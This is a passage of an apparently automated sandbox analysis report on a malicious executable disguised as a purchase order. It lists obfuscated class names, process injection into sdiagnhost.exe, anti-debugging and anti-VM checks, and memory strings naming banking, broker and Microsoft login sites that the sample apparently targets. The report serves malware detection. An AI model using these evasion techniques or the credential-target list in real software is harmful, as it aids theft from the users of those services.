                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, InJtUGJcH0iSuGM9D0.cs | High entropy of concatenated method names: 'ToString', 'rkX6yY5RCZ', 'OYF6rtyLwa', 'sUd6e86qBs', 'qIF6pP4GRE', 'vRV60n81Ah', 'wWJ6WFh1FD', 'Tbo6JCKnLr', 'O1j6Ri8dQG', 'UbP6EMVgUP'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, u4lEdcCxML7HcjyWbk.cs | High entropy of concatenated method names: 'Dispose', 'roGsmsEv0Y', 'tF5hrek6Lv', 'QYFOM5JSEJ', 'SvYsNCXhth', 'W8cszRhDXR', 'ProcessDialogKey', 'aukhwrHAxs', 'KWshsavNKd', 'JEchhGj4b6'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, yxAG4igptjhQAL7qfX.cs | High entropy of concatenated method names: 'Lu9LTosHV5', 'MBxLdfK7Dn', 'IoGLuo2u37', 'NXkLUYsB7v', 'yZVL9fYRD5', 'FfZLiQJd89', 'h56LCNZJnl', 'z6uLSVfRrt', 'gXALHKnXSa', 'LolLgpV0Tm'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, ueMMeIRfrwA3ETu6f1.cs | High entropy of concatenated method names: 'v6b8kw9Hn9', 'o4f8ckWVjW', 'a4q8841hGJ', 'v4n8BYq7Vs', 'gyS8PToGqS', 'P1d8Kg4gvu', 'Dispose', 'V7Jvdw9WCu', 'o9ZvuGkrDw', 'OA9vUFwP0i'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, c5btWpsiynYPfDct2o.cs | High entropy of concatenated method names: 'Fc0UZ6EJTr', 'hyHUqUS6lC', 'flaUn8e4GV', 'm2gUAp8HAV', 'CACUknm1Ig', 'tppU6sbdH1', 'q8yUc4LdSL', 'mHwUvkpyrH', 'mQ4U897qHt', 'qsGU4fF6xR'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, QLyBkiYt0Go5aKO1Up.cs | High entropy of concatenated method names: 'JbKuGaKtbk', 'Nvkuj7WX6f', 'Pitu5krjjR', 'Wa5uDEOnST', 'gZBuMBUak6', 'isHu2JCOOF', 'QIouVPUbDH', 'tPNubePc2u', 'GaxumN3kEj', 'NbduNt0YRx'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, qGRJwynvhE5akRdOJu.cs | High entropy of concatenated method names: 'QdLCdPvSvx', 'SRWCUfJkm9', 'NX3Civdmxw', 'v5XiNIn3Fe', 'Slkizbf9VH', 'd7KCwDdGWd', 'kA8CsYfyMq', 'nbBCh0VSdr', 'oN5CLgc9nt', 'nBuCINGhKG'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, LFRYuTGvWOMHuIMSMI.cs | High entropy of concatenated method names: 'H9KkVS3009', 'wxdkbtvLcC', 'liSkmDofnt', 'YBkkN2iil5', 'PjcvAq8W16K1x12waLK', 'GeC4Rt8DRQr1OsH9FZL', 'ih5TQ88ScZRBVFyAIuY'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, pnLbb94JCMiLfVIuHb.cs | High entropy of concatenated method names: 'p2e4UMZ2uu', 'TlE49CJ1eZ', 'o2W4i74ku8', 'GcU4CKRtbb', 'idt486GQRG', 'sqc4Syuo89', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, FBMo2BQar0VrdJhNfA.cs | High entropy of concatenated method names: 'mpIkf4bXOA', 'w8OkYG9MUl', 'NWCkGUEoUY', 'whykjaqsvs', 'HANkrnaJrQ', 'Kq6ke6xmnF', 'fkrkptRbcy', 'v4yk05v7Lw', 'gYBkWX41xI', 'reJkJLd84Y'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, bPWVTiE5Z9HKxopMdc.cs | High entropy of concatenated method names: 'pojcb7stAW', 'voVcNiJNbu', 'oRcvwTblRj', 'relvsbXOOE', 'tvBcy7wxDd', 'Os9cYc4YLZ', 'Vctc3nifeE', 'AoKcGRfn6k', 'jvAcj3VvdX', 'xDpc5QgQ2y'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, tyALKZSpnBFiSHeyWo.cs | High entropy of concatenated method names: 'tbZxgwXRS', 'aIJZShBtK', 'eANqaUtU6', 'JSD7esr61', 'KnRAxWPWE', 'poIXLfcGo', 'loX9qtxJu2Hvh3Evhq', 'Pmb9gKcUOx15hv6YTb', 'Dd3vtQuRJ', 'xiI4OMn2F'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, LaABg007jsrdOW4gMH.cs | High entropy of concatenated method names: 'cPZiTYSMFq', 'xtRiueQjds', 'BK0i9LSE6l', 'IY5iCY4pP8', 'NAOiS2Fgsg', 'lvl9MVAcPI', 'VcZ92Xrego', 'p5H9VXhaw1', 'FT19bH72de', 'yFT9m9jasf'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, LXh1rrbtkEYvTPYdLc.cs | High entropy of concatenated method names: 'oAB9QaMIUf', 'NWF975udC9', 'Y8AUeEqfsW', 'SW0UpbLHKr', 'R7CU0tIRta', 'S47UWlTIxj', 'VSFUJXLGiG', 'uqHURw66T6', 'TqRUEOhVyG', 's3RUfAUOFQ'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, ClpgZZH8XG7DZVYVUb3.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bj7O8myEBn', 'inMO40uy0M', 'rdeOB4fo3c', 'q3COO0ps60', 'nkyOP8BaUP', 'FImOtOm0bI', 'e51OKY4D6v'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, EbZ842HBJFhIslYw36j.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cKo4yEWFaQ', 'G244YqmJKA', 'Log43C3XbE', 'Etk4GGNClC', 'ytr4jLNgwd', 'Xq445WLDCE', 'sDF4DZAesj'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, gaLxhIcHqu4ohILFAv.cs | High entropy of concatenated method names: 'aqhcgdfuIe', 'XLqcFrJwKm', 'ToString', 'ocncdlpX6c', 'bLRcuPsTO7', 'zs3cUtPW0D', 'i78c9cdoJP', 'pxDci36vZl', 'W91cCHABym', 'xTqcStLoqn'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, dK3DXQMMhvybSpbFoC.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cV7hmGmSPH', 'tMchNYJ0fp', 'VoghzNVgEd', 'K58LwEARN3', 'OhfLs5LcLx', 'e9vLhHMfFf', 'P4PLLvG7IT', 'AJ6M9AhZ4KLbTX44wae'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, yMIQ06HHsgARpgeyFLZ.cs | High entropy of concatenated method names: 'KZk4NQ5Owq', 'Pog4zA1njb', 'gIMBwEiV7W', 'SaABswgDl1', 'esNBhV70UW', 'VTQBLItraf', 'OyyBIXnS7o', 'fQsBTAPmNJ', 'dTfBdyhhe1', 'tXKBuNUhjf'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, mIoZEuiKSLqGc1eeFE.cs | High entropy of concatenated method names: 'FKc8oYprtW', 'Nkv8rv5b4P', 'rOb8e64DxA', 'wsK8puqCc9', 'Lfw80Xb9sN', 'bdW8WMYmkT', 'DCV8Jy6ZFq', 'TqU8R89Sj6', 'gSs8EDRWfk', 'LNq8fUC0Ws'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, NwCEPEzrFnkLU98RAF.cs | High entropy of concatenated method names: 'kR74q2EQG7', 'bGO4nDjRl9', 'Dew4A0FpS0', 'v9f4ogHf8E', 'DWU4rvUcot', 'VCf4pfCUMl', 'Siw40YnfkO', 'wU84KiE4QB', 'Xs74aZ0OG1', 'tUH41FSZqt'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, Tg6XRevX7i4KRsbMD0.cs | High entropy of concatenated method names: 'tTQCaNFUqj', 'cWFC1Er6My', 'MTnCx6N7Vm', 'LQjCZKcX7K', 'h42CQ1340N', 'bFUCqeBIJQ', 'ufaC7aWp74', 'IhmCn5I2ZO', 'otNCAF8WHJ', 'oIVCX93IS1'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, iWSyLI8pVFVVT202jS.cs | High entropy of concatenated method names: 'tF6sCAb3ZX', 'aQDsS4IKds', 'tgFsgF0P93', 'SZ5sFef87o', 'axeskZmvhe', 'VF6s6gNrLS', 'rH9bSlHcsu1TPvtdiC', 'QyuZdmA6kwYHpZXOSx', 'mZ4ss6NI4S', 'zkWsLThF85'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, WcY88HmRHGlKXLbZmw.cs | High entropy of concatenated method names: 'F9wlnxSRfV', 'iJolAY5nBW', 'l0YloUx8Ps', 'oPPlrpCPQq', 'J9plp3udUp', 'dRZl0x7UKA', 'de5lJSlt2m', 'WJtlRNwVft', 'v6plf0QIPs', 'qHqly0R0Jb'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, InJtUGJcH0iSuGM9D0.cs | High entropy of concatenated method names: 'ToString', 'rkX6yY5RCZ', 'OYF6rtyLwa', 'sUd6e86qBs', 'qIF6pP4GRE', 'vRV60n81Ah', 'wWJ6WFh1FD', 'Tbo6JCKnLr', 'O1j6Ri8dQG', 'UbP6EMVgUP'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, u4lEdcCxML7HcjyWbk.cs | High entropy of concatenated method names: 'Dispose', 'roGsmsEv0Y', 'tF5hrek6Lv', 'QYFOM5JSEJ', 'SvYsNCXhth', 'W8cszRhDXR', 'ProcessDialogKey', 'aukhwrHAxs', 'KWshsavNKd', 'JEchhGj4b6'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, yxAG4igptjhQAL7qfX.cs | High entropy of concatenated method names: 'Lu9LTosHV5', 'MBxLdfK7Dn', 'IoGLuo2u37', 'NXkLUYsB7v', 'yZVL9fYRD5', 'FfZLiQJd89', 'h56LCNZJnl', 'z6uLSVfRrt', 'gXALHKnXSa', 'LolLgpV0Tm'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, ueMMeIRfrwA3ETu6f1.cs | High entropy of concatenated method names: 'v6b8kw9Hn9', 'o4f8ckWVjW', 'a4q8841hGJ', 'v4n8BYq7Vs', 'gyS8PToGqS', 'P1d8Kg4gvu', 'Dispose', 'V7Jvdw9WCu', 'o9ZvuGkrDw', 'OA9vUFwP0i'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, c5btWpsiynYPfDct2o.cs | High entropy of concatenated method names: 'Fc0UZ6EJTr', 'hyHUqUS6lC', 'flaUn8e4GV', 'm2gUAp8HAV', 'CACUknm1Ig', 'tppU6sbdH1', 'q8yUc4LdSL', 'mHwUvkpyrH', 'mQ4U897qHt', 'qsGU4fF6xR'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, QLyBkiYt0Go5aKO1Up.cs | High entropy of concatenated method names: 'JbKuGaKtbk', 'Nvkuj7WX6f', 'Pitu5krjjR', 'Wa5uDEOnST', 'gZBuMBUak6', 'isHu2JCOOF', 'QIouVPUbDH', 'tPNubePc2u', 'GaxumN3kEj', 'NbduNt0YRx'
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, qGRJwynvhE5akRdOJu.cs | High entropy of concatenated method names: 'QdLCdPvSvx', 'SRWCUfJkm9', 'NX3Civdmxw', 'v5XiNIn3Fe', 'Slkizbf9VH', 'd7KCwDdGWd', 'kA8CsYfyMq', 'nbBCh0VSdr', 'oN5CLgc9nt', 'nBuCINGhKG'

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\PO 20495088.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: PO 20495088.exe PID: 2228, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | API/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\PO 20495088.exe | Memory allocated: 1580000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 20495088.exe | Memory allocated: 2F30000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 20495088.exe | Memory allocated: 4F30000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 20495088.exe | Memory allocated: 7F00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 20495088.exe | Memory allocated: 8F00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 20495088.exe | Memory allocated: 90B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 20495088.exe | Memory allocated: A0B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0176096E rdtsc 6_2_0176096E
                Source: C:\Users\user\Desktop\PO 20495088.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4909
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 642
                Source: C:\Users\user\Desktop\PO 20495088.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | API coverage: 2.7 %
                Source: C:\Users\user\Desktop\PO 20495088.exe TID: 6176 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4072 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2292 | Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 2260 | Thread sleep count: 38 > 30
                Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 2260 | Thread sleep time: -76000s >= -30000s
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe TID: 6720 | Thread sleep time: -50000s >= -30000s
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe TID: 6720 | Thread sleep time: -34500s >= -30000s
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Code function: 9_2_001CC700 FindFirstFileW, FindNextFileW, FindClose, 9_2_001CC700
                Source: 4t-S77XJ.9.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 4t-S77XJ.9.dr | Binary or memory string: discord.comVMware20,11696428655f
                Source: 4t-S77XJ.9.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 4t-S77XJ.9.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 4t-S77XJ.9.dr | Binary or memory string: global block list test formVMware20,11696428655
                Source: 4t-S77XJ.9.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 4t-S77XJ.9.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 4t-S77XJ.9.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 4t-S77XJ.9.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 4t-S77XJ.9.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 4t-S77XJ.9.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 4t-S77XJ.9.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 4t-S77XJ.9.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 4t-S77XJ.9.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 4t-S77XJ.9.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027B6000.00000004.00000020.00020000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899193179.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2884948487.000002651707C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 4t-S77XJ.9.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 4t-S77XJ.9.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: 4t-S77XJ.9.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 4t-S77XJ.9.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 4t-S77XJ.9.dr | Binary or memory string: AMC password management pageVMware20,11696428655
                Source: 4t-S77XJ.9.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: PO 20495088.exe, 00000000.00000002.2337590085.00000000011B2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 4t-S77XJ.9.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 4t-S77XJ.9.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 4t-S77XJ.9.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 4t-S77XJ.9.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 4t-S77XJ.9.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: 4t-S77XJ.9.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 4t-S77XJ.9.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 4t-S77XJ.9.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 4t-S77XJ.9.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 4t-S77XJ.9.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\PO 20495088.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\sdiagnhost.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_00417A63 LdrLoadDll, 6_2_00417A63
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017B8158 mov eax, dword ptr fs:[00000030h] 6_2_017B8158
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01726154 mov eax, dword ptr fs:[00000030h] 6_2_01726154
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0171C156 mov eax, dword ptr fs:[00000030h] 6_2_0171C156
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017B4144 mov eax, dword ptr fs:[00000030h] 6_2_017B4144
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017B4144 mov ecx, dword ptr fs:[00000030h] 6_2_017B4144
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01750124 mov eax, dword ptr fs:[00000030h] 6_2_01750124
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017CA118 mov ecx, dword ptr fs:[00000030h] 6_2_017CA118
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017CA118 mov eax, dword ptr fs:[00000030h] 6_2_017CA118
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E0115 mov eax, dword ptr fs:[00000030h] 6_2_017E0115
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017CE10E mov eax, dword ptr fs:[00000030h] 6_2_017CE10E
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017CE10E mov ecx, dword ptr fs:[00000030h] 6_2_017CE10E
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017501F8 mov eax, dword ptr fs:[00000030h] 6_2_017501F8
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017F61E5 mov eax, dword ptr fs:[00000030h] 6_2_017F61E5
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0179E1D0 mov eax, dword ptr fs:[00000030h] 6_2_0179E1D0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0179E1D0 mov ecx, dword ptr fs:[00000030h] 6_2_0179E1D0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E61C3 mov eax, dword ptr fs:[00000030h] 6_2_017E61C3
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A019F mov eax, dword ptr fs:[00000030h] 6_2_017A019F
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0171A197 mov eax, dword ptr fs:[00000030h] 6_2_0171A197
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01760185 mov eax, dword ptr fs:[00000030h] 6_2_01760185
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017DC188 mov eax, dword ptr fs:[00000030h] 6_2_017DC188
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017C4180 mov eax, dword ptr fs:[00000030h] 6_2_017C4180
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0174C073 mov eax, dword ptr fs:[00000030h] 6_2_0174C073
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01722050 mov eax, dword ptr fs:[00000030h] 6_2_01722050
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A6050 mov eax, dword ptr fs:[00000030h] 6_2_017A6050
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017B6030 mov eax, dword ptr fs:[00000030h] 6_2_017B6030
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0171A020 mov eax, dword ptr fs:[00000030h] 6_2_0171A020
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0171C020 mov eax, dword ptr fs:[00000030h] 6_2_0171C020
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0173E016 mov eax, dword ptr fs:[00000030h] 6_2_0173E016
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A4000 mov ecx, dword ptr fs:[00000030h] 6_2_017A4000
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017C2000 mov eax, dword ptr fs:[00000030h] 6_2_017C2000
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0171C0F0 mov eax, dword ptr fs:[00000030h] 6_2_0171C0F0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017620F0 mov ecx, dword ptr fs:[00000030h] 6_2_017620F0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0171A0E3 mov ecx, dword ptr fs:[00000030h] 6_2_0171A0E3
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A60E0 mov eax, dword ptr fs:[00000030h] 6_2_017A60E0
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017280E9 mov eax, dword ptr fs:[00000030h] 6_2_017280E9
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A20DE mov eax, dword ptr fs:[00000030h] 6_2_017A20DE
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E60B8 mov eax, dword ptr fs:[00000030h] 6_2_017E60B8
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E60B8 mov ecx, dword ptr fs:[00000030h] 6_2_017E60B8
                Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017B80A8 mov eax, dword ptr fs:[00000030h] 6_2_017B80A8
